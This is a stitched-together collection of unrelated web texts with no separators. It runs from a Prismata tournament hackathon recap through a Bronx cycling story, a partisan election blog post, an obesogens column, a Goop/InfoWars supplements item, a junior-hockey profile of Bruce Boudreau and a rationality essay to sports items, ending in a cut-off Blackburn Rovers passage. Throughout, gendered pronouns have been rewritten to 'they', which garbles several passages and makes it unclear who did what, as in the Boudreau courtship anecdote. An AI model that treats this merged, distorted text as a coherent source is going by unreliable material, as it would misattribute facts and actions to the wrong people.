There were two major components to the tournament code: the client code, which runs on the user's machine and is written in Actionscript 3, and the server code, which is written in Python and runs on our servers, being responsible for globally managing the tournaments. Our respective roles in the project were something like this:
Alex: They wrote the brains of the tournament; modules to decide who to pair against whom, keep track of wins and losses, and decide the results of the tournament. Alex planned to eventually add dozens of tournament types, but for the hackathon, they focused on building robust infrastructure for single elimination and Swiss tournaments.
Me (Elyot): I wrote almost all of the remaining server code, plus various bits of client code to interface with it. The functions I wrote allowed users to see which tournaments were going on, report their results, and join and leave tournaments. I also wrote the code that automatically started games.
Alexey: They did a couple of things. Alexey spent most of the first day writing client-side code to allow users to be summoned into tournament games while they were playing, observing games, or examining replays. Prior to the hackathon, users could only enter games from the menu screen, and a lot of work was necessary to allow users to transition from one game screen to another. During the second day, Alexey worked mostly on code that updated the client's view of the tournament, ensuring that users correctly were able to see the current tournament standings and results.
Will: Developer of the Prismata game engine itself, Will spent most of the hackathon working on behind-the-scenes code for the client-side view of the tournament, ensuring that each user would properly know everything about all ongoing tournaments, and verifying that this information was updated correctly as tournaments progressed.
TC: Our user interface intern, TC built all of the menus screens, buttons, and lists that you currently see in the tournaments section of the game. We decided on a fairly simple interface for now, opting for something that would be working as soon as possible.
Doing it live
What made the hackathon even more exciting was that we streamed the whole thing live on our twitch channel. Due to some reddit posts on /r/gamedev and /r/programming that became quite popular, we ended up getting thousands and thousands of viewers. The twitch chat gave us a chance to interact with fans and obtain suggestions on features they'd like to see in Prismata's tournaments. A few twitch viewers even spotted bugs in our code as we were developing it!
All of the documentation we generated for the project was made publicly available. You can still check it out:
Our FAQ, which explains who we are and why we ran the hackathon
Our trello board (an online TODO list)
Our dev plan, including the client-server protocol
The tourney settings spec, which lists all of the options that we planned to support for various different tourney types
There was one pretty annoying issue that was felt by our team. After some testing, it was decided that the internet connection at our office didn't have nearly enough upload bandwidth to allow us to have a high quality stream (and good stream quality is important if we want our viewers to be able to see the code we're working on). Unfortunately, this meant that I had to stream from home and communicate via instant message and video chat with the other team members, who all worked together at the office (another option would have been for everyone to work from my place, but the living room would have been REALLY crowded)! Fortunately, my home is only a two-minute walk from the office, so people could pop over if there was anything serious to discuss.
The results
It worked! We ran a full 38-person Swiss tournament only minutes after the timer hit zero. Some user interface features were still missing, but overall, the hackathon was a massive success.
There was actually only one major bug: the withdrawal from tournament button didn't work due to a faulty assertion that wasn't removed before the final version of the software was pushed. The code itself wasn't even wrong, but the button refused to work unless all assertions passed, so users could only remove themselves from an ongoing tournament by forfeiting a game.
List of features that worked by the end of the hackathon:
Single elimination and Swiss tourneys
Ability to choose time controls and unit pools for the tourney
Public and private tourneys, with the ability for the host to invite friends to join
Ability for players to view all public tourneys, see the tourney lobby, and register/unregister
Support for draws, host kicking, and forfeits/noshows (with automatic kicking of noshows)
Automatic timed dispatching of tourney games, with users automatically transferred into tourney matches
Some fun facts:
Total man-hours worked by 5 developers over 2 days: about 90
Total lines of code added: 4439
Total number of git commits: 146
Total number of tasks in the DONE pile on our trello board: 53
Number of players in our first ever Prismata tournament: 38 (+9 late registrants)
Winner of that tournament: Poker superstar Mike ‘Timex' McDonald
Overall, the hackathon was a fun and highly productive experience. My biggest regret: having our team physically separated because of the need to stream from home. I think our communication efficiency would have been a bit higher if we'd all been in the same room while working on the project, and this would have led to fewer misunderstandings, fewer bugs, and faster bug-fixing. Nevertheless, the stream got thousands of views and generated a lot of interest in Prismata, so it was definitely worthwhile to have one of us (me) work from home so that the hackathon could be streamed. Rumour has it that our building is receiving a wiring upgrade soon that will facilitate fibre internet, so perhaps we'll be able to stream the next hackathon live from Lunarch Studios HQ.
But obstacles remain to make bike paths safer
When Celestino Calexto first opened EZ Hardware on Willis Avenue in Mott Haven five years ago, they were surprised by how many customers came in looking for bike parts and repairs. Over the years, as the requests became more frequent, Calexto figured they had stumbled onto another business opportunity. Two months ago, they and their business partners opened a full-fledged bike store on 138th Street — Cruz Bicycles Shop — with new and used bikes for sale, as well as any parts or accessories a cyclist could need.
Calexto's story is one example of the bike culture explosion in New York City, which has been fiercely promoted by the city's Department of Transportation under former Mayor Bloomberg, and now under Mayor de Blasio. Since 2007, commuter cycling has more than doubled and bike lanes have more than tripled. In 2013, the city launched a bike share program, CitiBike, with 6,000 bikes stationed around lower Manhattan and Brooklyn.
But while 65 miles of bike lanes were installed in the Bronx between 2007 and 2013, there is only one protected bike lane, outside the original greenway that winds through Bronx Park. And as the bike share program expands, the Bronx is still left out. Despite these challenges, local biking initiatives are taking hold in the South Bronx.
“We started organizing bike rides, exploring the idea that when you get together and ride, you create a social sculpture, you create safety in the streets, making the reality for ourselves,” said Elizabeth Hamby, a Mott Haven artist who co-founded Boogie Down Rides with fellow artist Hatuey Ramos-Fermin in 2012 to promote cycling in the borough.
Hamby is now involved with the Bronx Activist Committee of Transportation Alternatives, which advocates for better and safer mass transit, walking and biking. A 2014 highlight for Hamby was the re-instatement of Summer Streets on the Grand Concourse, when cars were banned and Bronx residents reclaimed one of the most dangerous arterial streets in the borough, and enjoyed music, dancing and socializing. “We've come a long way, but there's still a significant gap,” said Hamby.
The city's bike share program announced their expansion plan, which will bring the total number of bikes to 12,000 and stations to 700 by 2017. But the Bronx wasn't included.
“That's not right,” said Rob Colon of Morrisania, who works at Neighborhood Cycles in Melrose.
Department of Transportation Commissioner Polly Trottenberg announced a plan to add 50 miles of bike lanes per year, five miles of which will be protected lanes. In addition, Trottenberg announced a new program to make city bridges safer for cyclists. Five Harlem River crossings between the Bronx and Manhattan will be the department's first focus, they said at the City Council's transportation oversight committee in November.
“If there were more bike lanes like the Hudson River Greenway, it'd be cool,” said Raphael Maldonado who lives in the Patterson Houses and got into biking about three years ago. They have joined the Bronx Classics Bike Club on their ride to Coney Island, as well as Transportation Alternatives' Tour de Bronx, New York State's largest free bike ride.
The South Bronx is also scheduled to see new connections to Manhattan via the High Bridge and to Randall's Island in 2015. And U.S. Rep. Jose Serrano secured $5.7 million in federal funds for three pedestrian and bicycle safety projects on Bruckner Boulevard, East Tremont Avenue and the Grand Concourse.
However, street safety remains a big issue. As of November, 19 cyclists were killed while riding in the city, compared to 12 for the entire calendar year in 2013, as reported by the NYPD.
“People need to understand they are driving deadly weapons,” said Longwood resident and regular cyclist Damian Griffin.
When Mayor de Blasio took office, they introduced the Vision Zero action plan, which aims to end traffic deaths and injuries citywide. The plan includes increased traffic law enforcement, street re-designs, legislation and education.
Despite the hazards of riding, Griffin still believes “the bike is the best mode of local transport.” Their daily commute from Longwood to Norwood takes about 30 minutes, compared to the hour it would take on mass transit. They also enjoy cycling because it builds exercise into their daily routine. “Biking improves mental and physical health, develops a sense of community with people on the streets and strengthens our connection to the environment.”
Hamby agrees. “Biking is a fun and quick way to travel, and a great way to experience what the Bronx has to offer.”
Contact Joe Hirsch at [email protected]
We all deal with grief differently and sadly, we've had more than our fair share around here. My dear friends and fellow C&Ler's Fran and Nicole both lost their mothers this past week, and we're collectively grieving over the election of a openly fascist, racist, misogynist, xenophobic loose cannon who has promised to make the lives of millions of our fellow Americans miserable and who is currently surrounding themselves with a bunch of right wing zealots as part of their transition team.
It's going to be a rough next four years, to put it mildly and more than ever, we need to come together and vow not to give up the fight and see if we can start to right this ship during the midterm election in two years. And in the meantime, it's going to be ugly.
I expect Trump's enablers in the media to continue to do their best to normalizing what is not, and should never be considered normal, and telling all of us how Trump has got a "mandate," even though they never gave the same consideration to President Obama who won their elections with huge majorities, and we find ourselves with another president who was elected without winning the popular vote.
Here's the lineup for this week's Sunday gab-fest, courtesy of the Orlando Sentinel, and to no one's surprise, it's packed with Trumpsters (Oh joy.):
This OnEarth column was written by Laura Fraser.
We all know that Americans — leading the way for the rest of the developed world — are getting fatter. We hear about the “obesity epidemic” on the TV news, with footage of people depicted from the waist down shuffling around in XXL sweatpants and carrying supersized sodas. The majority of us are overweight, complaining about how our jeans are getting tighter and wondering why, despite all our efforts to diet and go to the gym, the number on the scale keeps edging higher.
For years, the explanation for weight gain was straightforward: it was all about energy balance, or calories-in versus calories-out. This Gluttony and Sloth theory held that obesity simply came from overeating and underexercising, and the only debate was about dieting — whether it was better to join the low-fat or the low-carb camp. Some scientists explored genetic differences associated with fat, but others said genes couldn't possibly explain the rate at which Americans were gaining weight: “We just aren't evolving that fast,” one obesity expert noted.
Environmental scientists have long suggested that there were likely external factors at work, but until recently, the traditional obesity-research community rejected such claims. Now it seems that the tide is turning: This month's issue of Obesity Reviews features an extensive look at the accumulating body of research linking the environment with obesity.
The idea of our surroundings contributing to weight gain is nothing new, of course. But past discussions about the role of the “environment” focused mostly on the fast-food culture that we live in, where highly processed, highly caloric foods are constantly available, eating times are chaotic, kids run around drinking sugar-saturated sodas all day, no one has time to cook, fruits and vegetables are scarce in low-income urban areas, a venti frappuccino has 760 calories, and muffins are the size of melons. Add to that our changing physical environment — the fact that everyone sits in front of computers every day, instead of working out or working on the farm — and the “calories in” excess of the weight equation seems obvious, and obesity over-determined.
But even allowing for such influences, something wasn't adding up. There are plenty of people out there who eat well and exercise like Gwyneth Paltrow and still feel like their weight is out of control. Then there are those annoying people who eat everything they desire, never work out, and stay thin. There had to be more to it than calories. We know that hormones — the chemical messengers produced by our endocrine system to control things like blood pressure and insulin production — can fatten up animals for slaughter; that some drugs increase your weight; and that a change in hormones at midlife shifts where your fat is distributed. Researchers began to recognize that obesity is much more complicated than calories in and out, and that a lot of other mechanisms involving the hormonal regulatory system are involved in our bodies' delicate weight balance.
Paula Baillie-Hamilton, an expert on metabolism and environmental toxins at Stirling University in Scotland, was among the first to make the link between the obesity epidemic and the increase in the chemicals in our lives. “Overlooked in the obesity debate,” they wrote in 2002 in the Journal of Alternative and Complementary Medicine, “is that the earth's environment has changed significantly during the last few decades because of the exponential production and usage of synthetic organic and inorganic chemicals.”
Exposure to those chemicals, said Baillie-Hamilton, can damage the body's natural weight-control mechanisms. They call toxic chemicals that act as endocrine disruptors — mimicking hormones, and blocking or exaggerating our natural hormonal responses — “chemical calories,” and those in question include Bisphenol A, phthalates, PCBs, persistant organic pollutants such as DDE, a breakdown product of the insecticide DDT, and pesticides containing tin compounds called organotins. Many studies have shown that endocrine disruptors have been linked to early puberty, impaired immune function, different types of cancer, birth deformities, and other diseases. Now obesity and metabolism are on that list.
Environmental researchers call these chemical calories “obesogens.” Bruce Blumberg, a University of California at Irvine professor of developmental and cell biology, studies the effects of endocrine disruptors on obesity in mice and sees clear differences between those who are exposed to them and those who aren't. “Pretty much anyone who observes people knows that obesity is way more than eating and exercise,” says Blumberg. Instead, metabolism, appetite, and the number and size of fat cells you have come into play, all of which are affected by hormones, and therefore by hormone disruptors. Blumberg has shown that the organic pollutants tributyltin and triphenyltin derail the hormonal mechanisms that control the weight of mice. He's found that when pregnant mice are fed a dose of organotins that is equivalent to normal human exposure to those chemicals, their offspring have 10 percent more fat cells than normal mice, the fat cells grow bigger than normal, and they end up, overall, 10 percent fatter than your average mouse.
Other compelling research that fat is not just about eating and exercise comes from studies that show that animals that live in human environments get fatter just by virtue of being around people. Researchers at the University of Alabama recently found that chimpanzees, macaques, mice, rats, dogs, cats, and other species that lived in proximity to humans got fatter than animals that didn't live in an industrialized environment — even when their lab chow and exercise was highly controlled. The authors suggested that endocrine disruptors were one likely culprit in this cross-species obesity epidemic.
For their article in the new Obesity Reviews, Jeanett Tang-Peronard, of the Institute of Preventive Medicine in Copenhagen, looked at some 450 studies on endocrine disruptors and obesity and found that nearly all of them showed a correlation between exposure to those chemicals — particularly in utero and in early childhood, when hormonal mechanisms are vulnerable — and an increase in body size. They say that in early life, chemicals seem to alter the epigenetic regulation of certain genes, disrupting the programming of hormonal signaling pathways that affect fat storage, fat distribution, and appetite. (The epigenome governs patterns of gene expression.) This reprogramming could explain how we are indeed evolving so fast.
Tang-Peronard says that it is impossible, now, to tease out how much of obesity is caused by chemicals, and how much by energy balance. They're intertwined, anyway, with imbalances in appetite-regulating hormones like leptin and ghrelin causing us to want to eat more of the available food. “Endocrine disruptors may play
a significant role in obesity,” they say. But the research is in its infancy. They also point out that only a few of the tens of thousands of known environmental chemicals have been tested for their association with obesity. “We are only scratching the surface,” they say.
What to do about the problem of endocrine disruptors and obesity? It's hard to say, given that virtually all humans have been exposed. Pediatrician Maida Galvez is involved in the Mt. Sinai “Growing Up Healthy” study of 330 children in East Harlem, monitoring their exposure to endocrine disruptors and their body weight. “Even if these chemicals play a small role in obesity, it's a preventable exposure,” they say, explaining that if certain substances can be determined to have deleterious effects, we can avoid them at critical stages of development and ultimately replace them with safer alternatives.
For now, Galvez recommends that parents steer clear of Bisphenol-A — present in many plastic water and baby bottles, and in microwavable and dishwasher-safe food containers. (If you find a printed “7” on the bottom, get rid of it.) They also suggest avoiding shampoos, cosmetics, and soaps containing phthalates — up to 70 percent of “top-selling products,” according to a 2002 report by the Environmental Working Group. (Look for fragrance-free products, which are less likely to contain phthalates, or for anything from the Illumina Organics range or The Body Shop.). And, they say, eat fresh fruits and vegetables, instead of foods that are processed and/or packaged in plastic.
That's one point on which traditional obesity researchers and environmental scientists agree: Eat plenty of fresh, organic vegetables. And while you're at it, get out into the fresh air and get some exercise.
Artist uses new interface to create music
Pretty cool concept from Korean new media artist Viktor Jan. It's called “Beatoven” and it incorporates the principles of cooking with creating new music.
The project allows users to mix sounds in a very realistic cooking experience — a pot is placed on the “stove” and “ingredients” in the form of different shaped boxes get dropped into the pot to play different tracks and form a new sound.
On top of the stove, there are revolving buttons that allow the DJ to adjust the “heat” and change the sound. When the lid gets placed on top of the pot, the sound slows down to give the experience that the music is actually coming from inside the pot.
Video of the Beatoven in action below:
Right-wing provocateur Alex Jones and actor and lifestyle guru Gwyneth Paltrow (composite image)
The same expensive, dubiously beneficial “wellness supplements” are available for sale at Oscar-winning actor Gwyneth Paltrow's tony Goop lifestyle blog and at Texas-based conspiracy-monger Alex Jones' InfoWars.com, said Quartz on Thursday.
While the conventional wisdom says red and blue America will never see eye-to-eye and that the cultural gulf that between “coastal elites” and “white working class America” is all but uncrossable, it seems Lululemon-wearing Manhattanites and angry rural Trump supporters can agree that adding “eleuthero root, cordyceps mushrooms, and ‘nascent iodine'” to your diet can somehow boost your life essence.
“Near the end of a profile of Amanda Chantal Bacon, founder of the ‘wellness' brand Moon Juice, the New York Times Magazine noted that many of the alternative-medicine ingredients in their products are sold — with very different branding — on the Infowars store,” wrote Quartz' Nikhil Sonnad.
Sonnad continued, “Moon Juice is frequently recommended by Gwyneth Paltrow's wellness blog, Goop; it's a favorite of Hollywood celebrities and others who can afford things like $25 ‘activated cashews.' Infowars, on the other hand, is a dark corner of the American right, heavy on guns, light on government intervention, and still very mad at Obama.”
Quartz assembled a compendium of ingredients sold at both Moon Juice and InfoWars, the names they fly under at each site — “Super Male Vitality” at InfoWars is sold as “Sex Dust” Moon Juice — and their respective costs.
Read the full post — and see how much you may be overpaying for your Reishi mushrooms — here.
Multilevel marketing schemes are a staple in the right-wing methods of generating revenue. Glenn Beck, Jones, Rush Limbaugh, President Donald Trump and Ben Carson have all lent their names to dubious “supplements” and shilled for pyramid schemes.
All of this is an outgrowth of the tangled network of mailing lists, mail order scams, PACs and other money-making endeavors that prey off of gullible conservative voters, many of whom are elderly and on fixed incomes.
A 2015 report said that Republican voters donated more than $50 million in 2014 to scam political outfits like SarahPAC, only to have that money “siphoned off to vendors, wasted, and just plain old pocketed by people in these PACs.”
Benefit the Ellerbe Creek Watershed Association
This event is a fundraising event to benefit the ELLERBE CREEK WATERSHED ASSOCIATION. The mission of the Ellerbe Creek Watershed Association is to:
• Enable a living creek - a healthy stream in which an appropriately diverse group of native fish and invertebrate species thrive.
• Create a network of preserves and trails along which people can hike, bike, and walk from the Ellerbe Creek headwaters to Falls Lake.
• Build ties among Durham's diverse neighborhoods and communities using Ellerbe Creek as a link.
• Partner with the City and other groups that seek to move Durham to become a regional model for proactive urban stormwater management.
• Help adults, and especially kids, have the opportunity to enjoy and appreciate being outdoors in a learning and safe environment.
Help the Ellerbe Creek Watershed Association achieve their goals while drinking refreshing beers and eating tasty food at the 6th Annual Bull City Food and Beer Experience.
Bruce Boudreau is ubiquitous in hockey circles.
They were an extra in "Slap Shot." In fact, they even taught Paul Newman how to take one. Wayne Gretzky once cited Boudreau -- who averaged more than 100 points a season for the Toronto Marlboros of the Ontario Hockey Association -- one their favorite players as kid. Over four-plus decades, Boudreau has played for or coached 27 teams, including 763 career games behind the bench for the Washington Capitals, Anaheim Ducks and Minnesota Wild. In April, the Associated Press published an article analyzing "The Sixteen Degrees of Bruce Boudreau," connecting the 62-year-old to each of the 16 2017 Stanley Cup playoff teams.
Boudreau often tells friends they were put on Earth to promote hockey. This summer, they backed that up. "I kind of just said, 'What the heck,' " Boudreau said. "And I bought a friggin' hockey team."
One year after taking over the reins of the Wild, Boudreau and their wife, Crystal, have become minority owners in a junior hockey team: the Blue Ox, an United States Premier Hockey League expansion team in Coon Rapids, Minnesota. If it sounds like a whim purchase, well, only sort of. If it feels like an uncommon extracurricular activity for a current NHL bench boss, that's definitely true. More than anything, though, it's a story of hockey vagabonds finally finding a home -- and yes, of Boudreau promoting the sport with which he's already so entrenched.
So how did this all unfold?
"It wasn't planned, that's for sure," said Jay Witta, who is a minority owner, GM and coach of the Blue Ox. "Actually, the whole thing happened after one lunch meeting."
Witta coached Boudreau's son, Brady, last season for the New Ulm Steel of the North American Tier III Hockey League. Witta resigned after the season, looking for a new challenge. Boudreau loved Witta's coaching style, so they met for a bite in April to chat. Witta suggested they should start a new team together.
"If you find a team," Boudreau told Witta, "I'm in."
A week later, Witta called. "Sooo," they said. "I think I found us a team."
Wayne Gretzky frequently watched Bruce Boudreau play for the Toronto Marlboros and has called Boudreau one of their childhood heroes. Juan Ocampo/NHLI via Getty Images
Boudreau brought the idea to Crystal. "We asked: Is it financially viable? Yes. Can we have control? Yes," Crystal says. "And that was important because it's our reputation on the line." They closed the deal to buy the team by the end of May.
With 61 teams, including nine in Minnesota, the USPHL is the largest amateur league in the country. It is for 16- to 20-year-olds pursuing the next level of hockey, in some ways equivalent to the junior leagues in Canada, the primary source of players for the NHL. "We do have some NHL placements," commissioner Richard Gallant said. "But our No. 1 goal is college placements."
Brady Boudreau will be one of of the Blue Ox goaltenders this season. "At first [Brady] didn't want to play for them. They said, 'They're just going to think I made the team because of you,'" Crystal said. "Finally, they said, 'You know what, people are going to think that no matter what. I want to play for you.' And now they get to live at home, which they haven't done for two years."
After last season, more than 300 USPHL players advanced to play in college -- either Division I, II, III or club hockey. "There's a void sometimes between high school hockey and college hockey," Boudreau said. "What happens to the guys who don't go right to D-I? This league is great, because we can keep kids playing as long as possible."
Said Witta: "It's funny, when you think of Bruce, you think of the gruff NHL coach. But you should see them anytime he's around kids. They love helping them out. At the hockey school they run with their family, there are kids flocking around them like he's the Pied Piper."
Recently, the USPHL has been expanding by five to 10 teams. "Quite frankly," Gallant said, "we're often approached by existing NHL players or big names [who] want to lend their name and start a team, but it's not their passion. With Bruce's group, they laid out a very serious plan. That was the difference in allowing them to go forward."
Witta, who has owned a marketing company for 20 years, included an 18-page outline of a business plan in the pitch.
"We all have our roles," Witta said. "I am hockey ops. Bruce, even though a lot of it is their philosophy, is the face. He'll get on a call with a kid for a recruiting pitch, and that has already worked. It got a guy to join our team last week. When the NHL season comes, [Boudreau] may pop in every once in awhile, but that's their primary job. And Crystal is the busy bee. Together, it really works."
Twenty-seven years ago, when Bruce Boudreau was playing for the IHL's Fort Wayne Komets, as they were leaving the arena one day they bumped into a woman who worked in the souvenir shop. They stared at them and asked them how old they are. "Twenty-one," they responded. They then asked them on a date.
Bruce and Crystal Boudreau have now been married 22 years.
"He told me they wouldn't have asked me out if I was younger than that," recalled Crystal, a Fort Wayne native. "I told them it was a good thing they didn't meet me a week earlier than that."
Crystal and Bruce Boudreau have moved 12 times in their 22 years together, every time because of hockey. They've built three houses. "We've learned our lesson, trust me," Crystal says. "No more building. We'll only buy new homes." Eliot J. Schechter/NHLI via Getty Images
Before meeting their future husband, Crystal didn't know who Wayne Gretzky was. "And now I've had dinner with him," they say. (The Marlboros, Boudreau's junior team, played half of their games in Gretzky's hometown of Brantford, Ontario, one season -- leading the Great One to call them "as good as any junior hockey player I'd ever seen" -- and later request that dinner himself.) "I never thought it would be this way, but hockey is now my life, too," Crystal said.
The couple has moved 12 times, every time because of hockey. They've built three houses. "We've learned our lesson, trust me," Crystal said. "No more building. We'll only buy new homes."
For years, Crystal worked in accounting, then became a teller manager at a bank but gave that up when they gave birth to Brady. When Boudreau coached the Mississippi Sea Wolves of the ECHL, Crystal worked for the team in immigration -- helping secure players' visas.
Every time Bruce was promoted, or fired, Crystal was the one who closed the bank accounts and packed boxes and set up in the new city. Eventually, they became such a veteran of the routine, that every time they signed Brady up for a hockey camp, they would get it in writing that the family would get the deposit back if their husband got a new job. "Bruce gets a new phone number every time they work for a new team, but my number has always been the same," Crystal said. "So I've always been the secretary. I'm everyone's contact for us."
In many ways, that prepared them for their current role with the Blue Ox, which is ... well, it's hard to describe. Crystal does everything from conducting background checks on billet families to cutting deals with equipment manufacturers to buying ice time. Even though they have a part-time job as a pastry chef, Crystal estimates they have been putting in 40-hour weeks for the Blue Ox.
"Every time Bruce has been fired, he's not resentful," Crystal said. "He's never been blindsided. Usually they know it's coming. And I try to take the attitude that it's a new adventure. I'm grateful for everything we have, but it is hard. For the coaches, OK, they go to a new team and they have built-in friendships. Guys sitting next to them in the office. We, the wives, have to meet new people, get established."
The Boudreaus are hoping, maybe, that streak ends. "We'd like to be Minnesotans," Boudreau said. "I don't want to move much more. And I like Minnesota. It's very similar to growing up in Ontario, and for Crystal, she's from the Midwest. The people are friendly, they all know hockey. My deal is pretty long here [a reported four years], so we feel like we can make friendships."
Added Crystal: "This wasn't a one-year deal, it was a longer contract. In the first few weeks we met all of our neighbors, and that's never happened before. And so with this hockey team, maybe this is something we can do for a while, and maybe pass along to our kids."
Once upon a time, a younger Eliezer had a stupid theory. Eliezer 18 was careful to follow the precepts of Traditional Rationality that they had been taught; they made sure their stupid theory had experimental consequences. Eliezer 18 professed, in accordance with the virtues of a scientist they had been taught, that they wished to test their stupid theory.
This was all that was required to be virtuous, according to what Eliezer 18 had been taught was virtue in the way of science.
It was not even remotely the order of effort that would have been required to get it right.
The traditional ideals of Science too readily give out gold stars. Negative experimental results are also knowledge, so everyone who plays gets an award. So long as you can think of some kind of experiment that tests your theory, and you do the experiment, and you accept the results, you've played by the rules; you're a good scientist.
You didn't necessarily get it right, but you're a nice science-abiding citizen.
(I note at this point that I am speaking of Science, not the social process of science as it actually works in practice, for two reasons. First, I went astray in trying to follow the ideal of Science—it's not like I was shot down by a journal editor with a grudge, and it's not like I was trying to imitate the flaws of academia. Second, if I point out a problem with the ideal as it is traditionally preached, real-world scientists are not forced to likewise go astray!)
Science began as a rebellion against grand philosophical schemas and armchair reasoning. So Science doesn't include a rule as to what kinds of hypotheses you are and aren't allowed to test; that is left up to the individual scientist. Trying to guess that a priori, would require some kind of grand philosophical schema, and reasoning in advance of the evidence. As a social ideal, Science doesn't judge you as a bad person for coming up with heretical hypotheses; honest experiments, and acceptance of the results, is virtue unto a scientist.
As long as most scientists can manage to accept definite, unmistakable, unambiguous experimental evidence, science can progress. It may happen too slowly—it may take longer than it should—you may have to wait for a generation of elders to die out—but eventually, the ratchet of knowledge clicks forward another notch. Year by year, decade by decade, the wheel turns forward. It's enough to support a civilization.
So that's all that Science really asks of you—the ability to accept reality when you're beat over the head with it. It's not much, but it's enough to sustain a scientific culture.
Contrast this to the notion we have in probability theory, of an exact quantitative rational judgment. If 1% of women presenting for a routine screening have breast cancer, and 80% of women with breast cancer get positive mammographies, and 10% of women without breast cancer get false positives, what is the probability that a routinely screened woman with a positive mammography has breast cancer? 7.5%. You cannot say, "I believe they don't have breast cancer, because the experiment isn't definite enough." You cannot say, "I believe they have breast cancer, because it is wise to be pessimistic and that is what the only experiment so far seems to indicate." 7.5% is the rational estimate given this evidence, not 7.4% or 7.6%. The laws of probability are laws.
It is written in the Twelve Virtues, of the third virtue, lightness:
If you regard evidence as a constraint and seek to free yourself, you sell yourself into the chains of your whims. For you cannot make a true map of a city by sitting in your bedroom with your eyes shut and drawing lines upon paper according to impulse. You must walk through the city and draw lines on paper that correspond to what you see. If, seeing the city unclearly, you think that you can shift a line just a little to the right, just a little to the left, according to your caprice, this is just the same mistake.
In Science, when it comes to deciding which hypotheses to test, the morality of Science gives you personal freedom of what to believe, so long as it isn't already ruled out by experiment, and so long as you move to test your hypothesis. Science wouldn't try to give an official verdict on the best hypothesis to test, in advance of the experiment. That's left up to the conscience of the individual scientist.
Where definite experimental evidence exists, Science tells you to bow your stubborn neck and accept it. Otherwise, Science leaves it up to you. Science gives you room to wander around within the boundaries of the experimental evidence, according to your whims.
And this is not easily reconciled with Bayesianism's notion of an exactly right probability estimate, one with no flex or room for whims, that exists both before and after the experiment. It doesn't match well with the ancient and traditional reason for Science—the distrust of grand schemas, the presumption that people aren't rational enough to get things right without definite and unmistakable experimental evidence. If we were all perfect Bayesians, we wouldn't need a social process of science.
Nonetheless, around the time I realized my big mistake, I had also been studying Kahneman and Tversky and Jaynes. I was learning a new Way, stricter than Science. A Way that could criticize my folly, in a way that Science never could. A Way that could have told me, what Science would never have said in advance: "You picked the wrong hypothesis to test, dunderhead."
But the Way of Bayes is also much harder to use than Science. It puts a tremendous strain on your ability to hear tiny false notes, where Science only demands that you notice an anvil dropped on your head.
In Science you can make a mistake or two, and another experiment will come by and correct you; at worst you waste a couple of decades.
But if you try to use Bayes even qualitatively—if you try to do the thing that Science doesn't trust you to do, and reason rationally in the absence of overwhelming evidence—it is like math, in that a single error in a hundred steps can carry you anywhere. It demands lightness, evenness, precision, perfectionism.
There's a good reason why Science doesn't trust scientists to do this sort of thing, and asks for further experimental proof even after someone claims they've worked out the right answer based on hints and logic.
But if you would rather not waste ten years trying to prove the wrong theory, you'll need to essay the vastly more difficult problem: listening to evidence that doesn't shout in your ear.
(For the benefit of those in the audience who have not been following along this whole time: Even if you can't look up the priors for a problem in the Handbook of Chemistry and Physics—even if there's no Authoritative Source telling you what the priors are—that doesn't mean you get a free, personal choice of making the priors whatever you want. It means you have a new guessing problem which you must carry out to the best of your ability. If the mind, as a cognitive engine, could generate correct estimates by fiddling with priors according to whims, you could know things without looking them, or even alter them without touching them. But the mind is not magic. The rational probability estimate has no room for any decision based on whim, even when it seems that you don't know the priors. Similarly, if the Bayesian answer is difficult to compute, that doesn't mean that Bayes is inapplicable; it means you don't know what the Bayesian answer is. Bayesian probability theory is not a toolbox of statistical methods, it's the law that governs any tool you use, whether or not you know it, whether or not you can calculate it. As for using Bayesian methods on huge, highly general hypothesis spaces—like, "Here's the data from every physics experiment ever; now, what would be a good Theory of Everything?"—if you knew how to do that in practice, you wouldn't be a statistician, you would be an Artificial General Intelligence programmer. But that doesn't mean that human beings, in modeling the universe using human intelligence, are violating the laws of physics / Bayesianism by generating correct guesses without evidence.)
Added: Nick Tarleton says:
The problem is encouraging a private, epistemic standard as lax as the social one.
which pinpoints the problem I was trying to indicate much better than I did.
Monday night, we had another example of a hockey player being super tough during the Capitals-Blue Jackets game. Columbus forward Boone Jenner got hit in the face by a teammate's shot while skating through the crease looking for a rebound. Jenner bled all over their jersey and lost two or three teeth. They went to the locker room for repairs.
It's nasty.
But that would not be the end of the night for Jenner. No, sir, it would not. According to Fox Sports' Dave Maetzold, the 22-year-old Canadian got about 20 stitches and “couldn't wait to get back into the game.” I would have been fine with sipping a Slurpee through a straw and calling it a night.
Boone Jenner might've lost a few teeth, but he's still smiling says @BlueJacketsNHL coach Brad Larsen.https://t.co/7goaWf86pR — FOX Sports Ohio (@FOXSportsOH) March 29, 2016
Jenner indeed returned mid-way through the second period sporting a full cage.
COMIN' IN HOT pic.twitter.com/63ygMpTnmn — Columbus Blue Jackets (@BlueJacketsNHL) March 29, 2016
Then in the third they came out in a full shield.
A new look for Boone Jenner for the 3rd in DC. #CBJ and Caps tied at 1. Watch now @FOXSportsOH pic.twitter.com/j7aJaU900z — Dave Maetzold (@DMaetzMedia) March 29, 2016
But here's where it gets kind of funny.
Dentist at Verizon Ctr thinking Boone's tooth has now been frozen to ice by Zamboni. Ice crew searched Zam snow after 1st with no luck. #CBJ — Dave Maetzold (@DMaetzMedia) March 29, 2016
Yes, Jenner's tooth will be forever immortalized in the Verizon Center ice because no one found it before the zamboni came out.
Only in hockey!
Full RMNB Coverage of Caps vs Blue Jackets
Advertisements
Share this story: Facebook
Twitter
Reddit
Tumblr
Pinterest
Still, 18 months after buying out the Walker family trust to take charge of a club which, for six more days at least, remains one of only four to win the Premier League , staying away was probably the first sensible decision taken by Venky's, the hapless poultry processors, since they arrived in Blackburn in Nov 2010.
Having spent almost £45 million to buy the club and clear its debts, Venky's can at least claim to have raised global awareness of their brand to unprecedented levels during their eventful spell in English football.
Little of the publicity has been positive, however, and they will quickly discover that there is not the same appetite for Blackburn versus Barnsley on the subcontinent as there might be for fixtures against Manchester United , Liverpool and Chelsea .
If there is a blueprint for how not to run a football club, it will surely come embossed with the Venky's logo. Blackburn's exasperated supporters ran out of patience with the owners months ago, but having directed their ire at manager Steve Kean for most of this season, the full vent of their fury on Monday night was aimed at Venky's, with chants like 'You're not fit to run the club' and 'Venky's Out'. When they arrived at the club, assorted spokespersons talked of investing substantial sums in the team and funding a return to European football.
But within a month, they sacked manager Sam Allardyce with the club lying in 13th position in the Premier League and replaced them with Kean, a managerial rookie with no experience of the job at any level. They were viewed as a stooge, a yes-man prepared to play along with the Venky's plan of changing the shape of the squad from one of experience to dubious potential.
